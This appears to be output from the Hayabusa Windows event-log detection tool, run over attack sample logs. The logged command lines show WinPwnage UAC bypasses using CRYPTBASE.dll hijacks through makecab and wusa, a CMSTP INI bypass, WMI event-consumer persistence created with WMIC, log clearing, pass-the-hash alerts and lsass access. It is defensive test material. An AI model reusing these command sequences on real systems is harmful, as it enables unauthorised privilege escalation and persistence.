+2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.378 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer:  | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,../hayabusa-rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.590 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
